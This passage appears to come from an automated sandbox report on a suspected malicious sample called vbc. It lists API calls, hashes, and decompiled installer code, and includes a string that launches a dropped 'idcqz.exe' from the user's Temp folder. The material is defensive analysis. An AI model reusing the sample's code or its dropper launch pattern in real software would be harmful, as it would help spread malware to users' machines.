SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
CreatePopupMenu.USER32 ref: 00405A9C
AppendMenuW.USER32 ref: 00405AB0
GetWindowRect.USER32(?,?), ref: 00405AD0
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
OpenClipboard.USER32(00000000), ref: 00405B31
EmptyClipboard.USER32 ref: 00405B37
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
GlobalLock.KERNEL32 ref: 00405B4D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
GlobalUnlock.KERNEL32(00000000), ref: 00405B81
SetClipboardData.USER32 ref: 00405B8C
CloseClipboard.USER32 ref: 00405B92

Strings

{, xrefs: 00405A75

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABB Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f60;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CB2(0x3fb, _t146);
					E004068F5(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CB2(0x3fb, _t146);
							if(E00406045(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040666E(0x79ff58, _t146);
							_t87 = E00406A3B(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040666E(0x79ff58, _t146);
								_t89 = E00405FE8(0x79ff58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F89(0x79ff58);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F58(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
									E00404F40(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff48);
									} else {
										E00404E77(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b44 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045EC(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
									E00404A14();
								}
								 *0x7a1f78 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f88;
							_v60 = E00404E11;
							_v56 = _t146;
							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F3D(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == 0x7b3800) {
									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
										lstrcatW(_t146, 0x7a6a40);
									}
								}
								 *0x7a1f78 =  *0x7a1f78 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
						E00405F3D(_t146);
					}
					 *0x7a7a78 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045CA(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045CA(_t167);
					E004045FF(_t166);
					_t138 = E00406A3B(8);
					if(_t138 == 0) {
						L53:
						return E00404631(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404abb
0x00404ac1
0x00404ac7
0x00404ad4
0x00404ae2
0x00404ae5
0x00404aed
0x00404af3
0x00404af3
0x00404aff
0x00404b02
0x00404b70
0x00404b77
0x00404c4e
0x00404c55
0x00404c64
0x00404c64
0x00404c68
0x00404c72
0x00404c7f
0x00404c81
0x00404c81
0x00404c8f
0x00404c96
0x00404c9d
0x00404ca0
0x00404cdc
0x00404cde
0x00404ce4
0x00404ce9
0x00404ced
0x00404cef
0x00404cef
0x00404d0b
0x00000000
0x00404d0d
0x00404d10
0x00404d1e
0x00404d24
0x00404d25
0x00404d28
0x00404d2b
0x00000000
0x00404d2b
0x00404ca2
0x00404ca4
0x00404ca8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404caa
0x00404caa
0x00404cb7
0x00404cbc
0x00000000
0x00000000
0x00404cc0
0x00404cc2
0x00404cc2
0x00404ccb
0x00404ccd
0x00404cd2
0x00404cd5
0x00404cda
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cda
0x00404d37
0x00404d41
0x00404d44
0x00404d47
0x00404d4e
0x00404d4e
0x00404d50
0x00404d50
0x00404d55
0x00404d57
0x00404d5f
0x00404d66
0x00404d68
0x00404d73
0x00404d73
0x00404d68
0x00404d83
0x00404d8d
0x00404d95
0x00404db0
0x00404d97
0x00404da0
0x00404da0
0x00404d95
0x00404db5
0x00404dba
0x00404dbf
0x00404dc8
0x00404dc8
0x00404dd1
0x00404dd3
0x00404dd3
0x00404ddf
0x00404de7
0x00404df1
0x00404df1
0x00404df6
0x00000000
0x00404df6
0x00404ca0
0x00404c57
0x00404c5e
0x00000000
0x00000000
0x00000000
0x00404c5e
0x00404b7d
0x00404b86
0x00404ba0
0x00404ba5
0x00404baf
0x00404bb6
0x00404bc2
0x00404bc5
0x00404bc8
0x00404bcf
0x00404bd7
0x00404bda
0x00404bde
0x00404be5
0x00404bed
0x00404c47
0x00404bef
0x00404bf0
0x00404bf7
0x00404c01
0x00404c09
0x00404c16
0x00404c2a
0x00404c2e
0x00404c2e
0x00404c2a
0x00404c33
0x00404c40
0x00404c40
0x00404bed
0x00000000
0x00404ba5
0x00404b93
0x00000000
0x00000000
0x00404b99
0x00000000
0x00404b04
0x00404b11
0x00404b1a
0x00404b27
0x00404b27
0x00404b2e
0x00404b34
0x00404b3d
0x00404b40
0x00404b43
0x00404b4b
0x00404b4e
0x00404b51
0x00404b57
0x00404b5e
0x00404b65
0x00404dfc
0x00404e0e
0x00404b6b
0x00404b6e
0x00000000
0x00404b6e
0x00404b65

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B0A
SetWindowTextW.USER32 ref: 00404B34
SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
CoTaskMemFree.OLE32(00000000), ref: 00404BF0
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,007A1F88,00000000,?,?), ref: 00404C22
lstrcatW.KERNEL32 ref: 00404C2E
SetDlgItemTextW.USER32 ref: 00404C40

Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5

Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406958
Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406967
Part of subcall function 004068F5: CharNextW.USER32(?), ref: 0040696C
Part of subcall function 004068F5: CharPrevW.USER32(?,?), ref: 0040697F

GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
MulDiv.KERNEL32 ref: 00404D1E

Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34

Strings

A, xrefs: 00404BDE
C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab, xrefs: 00404C1C, 00404C21, 00404C2C

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
API String ID: 2624150263-684180660
Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040666E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29

Uniqueness

Uniqueness Score: -1.00%

Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8ac8;
				_v28 =  *0x7a8ab0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8ab9 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F85(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f6c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f80;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f6c = 0;
								 *0x7a1f80 = 0;
								 *0x7a8b00 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00405005();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f80;
									_t201 =  *0x7a8ac8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8acc <= 0) {
										L86:
										if( *0x7a8b5e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
